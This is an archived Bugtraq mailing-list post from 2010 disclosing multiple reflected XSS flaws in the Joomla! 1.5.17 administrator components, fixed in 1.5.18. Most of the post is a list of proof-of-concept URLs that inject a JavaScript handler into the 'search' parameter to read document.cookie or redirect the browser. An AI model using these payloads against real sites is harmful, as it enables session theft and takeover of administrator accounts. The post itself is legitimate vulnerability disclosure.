lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AANLkTikLAI00y8EhaNKNG9DNcWDZUKeB7TNgbkC_bGfs@mail.gmail.com>
Date: Wed, 2 Jun 2010 02:49:40 +0530
From: Riyaz Walikar <riyazwalikar@...il.com>
To: bugtraq@...urityfocus.com
Subject: [20100501] - Core - Joomla! Multiple XSS Vulnerabilities in Back End 
	Administrative Module Core Components

Hi Bugtraq,

This is regarding multiple XSS vulnerabilities in multiple core
components of the administrative section of Joomla!

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html

Vulnerability Details:

User can execute arbitrary JavaScript code within the vulnerable application.


The vulnerability arises due to the administrator core components
failing to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result
in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection,
disclosure or modification of sensitive data and phishing attacks.


An attacker can send a link with the exploit to an administrator whose
access could compromise the application. The following PoC is
available:


http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E


http://joomlasite/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

Regards,
Riyaz Ahemed Walikar

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ